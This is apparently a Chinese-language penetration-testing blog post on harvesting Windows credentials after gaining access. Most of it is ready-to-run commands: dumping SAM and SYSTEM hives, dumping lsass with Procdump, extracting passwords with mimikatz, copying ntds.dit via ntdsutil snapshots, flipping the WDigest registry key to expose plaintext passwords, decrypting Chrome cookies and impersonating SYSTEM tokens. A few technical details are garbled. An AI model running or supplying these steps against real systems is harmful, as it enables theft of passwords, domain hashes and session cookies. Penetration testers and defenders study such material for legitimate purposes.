唔,已經到憑證收集了啊!
收集本機憑據是非常重要的環節.通常我們可以收集的憑據包括但不限於:Windows hash [NTLM,LM],瀏覽器密碼、cookie 遠程桌面密碼 VPN密碼 WLAN密碼 IIS服務器密碼 FTP密碼等等.
WINDOWS密碼
Windows密碼加密后一般兩種形式
NTLM哈希和LM哈希[VISTA和2008已經取消]這些哈希有兩個存儲位置,本地用戶在SAM數據庫,
域用戶存儲在域控制器的NTDS.dit數據庫中.當用戶登陸時,這些哈希也可能存儲在內存中,能夠被我們抓取到
SAM 是什么?
安全賬號管理器-也就是存儲用戶密碼的數據庫文件,
他在windows/system32/config/SAM中,掛載在HKLM/SAM上.
為了防破解,windows核心版本NT4.0中引入了SYSTEM函數,SAM的磁盤上副本文件將被部分加密,以便存儲在SAM中所有的本地賬戶immature哈希都使用密鑰(成SYSKEY加密)。
提取SAM 數據庫哈希方法,導出sam數據庫中的密碼
方法1:以管理員權限運行cmd,輸入以下命令
reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
方法2:使用powershell
powershell -exec bypass
Import-Module .\invoke-ninjacopy.ps1
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
將生成的sam.hive與system.hive轉至本地,使用saminside或cain導入
結果如下:
Procdump
離線提取進行lsass,vista及以上系統可以看到lsass進程, 右鍵創建轉儲文件.
Procdump.exe -ma lsass.exe lsass.dmp
獲取到內存轉儲文件后,就可以使用mimikatz提取密碼.
這里需要注意的是,運行mimikatz平台架構要與轉儲的系統兼容
Sekurlsa::minidump lsass.dmp
Sekurlsa::logonpasswords
導出域用戶hash,訪問域控的C:\Windows\NTDS文件夾
記錄GUID並且替換之后的命令
ntdsutil snapshot “mount {GUID}” quit quit
C盤中會生成新目錄,將其中的Windows\NTDS\ntds.dit拷貝出來
ntdsutil snapshot “unmount {GUID}” quit quit
ntdsutil snapshot " delete {GUID} " quit quit
使用Ntdsdumpex.exe提取hash
解壓密碼:zcgonvh
Ntdsdumpex.exe -r -d ntds.dit –o hash.txt
如有設置密碼則會生成相應的hash文件
使用mimakatz獲取hash與明文口令
privilege::debug
sekurlsa::logonPasswords
從 Windows 8.1 和 Windows Server 2012 R2 開始,LM 哈希和“純文本”密碼將不在內存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997 補丁。
抓取到了NTLM后,破解MD5
修改注冊表,啟用摘要密碼支持
需要創建UseLogonCredential,並賦值為1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders \WDigest “UseLogonCredential”(DWORD)
重新登錄后,再次運行就會直接抓取明文密碼。
mimikatz提取chrome中保存的cookie
首先把chrome保存cookie的文件拷貝到桌面上方便操作,這個文件在
C:\users\xxx\appdata\local\google\chrome\user data\default\cookies
命令行下拷貝的命令是:
Copy 'C:\users\xxx\appdata\local\google\chrome\user data\default\cookies ’ c:\users\xxx\desktop
mimikatz_trunk文件包中有個x64文件夾,進入並打開mimikatz.exe,輸入
dpapi::chrome /in:c:\users\xxx\desktop\cookies /unprotect
提取cookie,mimikatz的token模塊中的命令列出token,模仿system用戶token
選擇以管理員身份運行mimikatz.exe,
privilege::debug #獲取debug權限
token::elevate #模仿system用戶的令牌
token::list #列出令牌
lsadump::sam #來獲取sam數據庫中的密碼
token::revert #恢復令牌
感言:
好吧,沒有感言!
參考鏈接:
內網滲透測試的藝術[二]憑證收集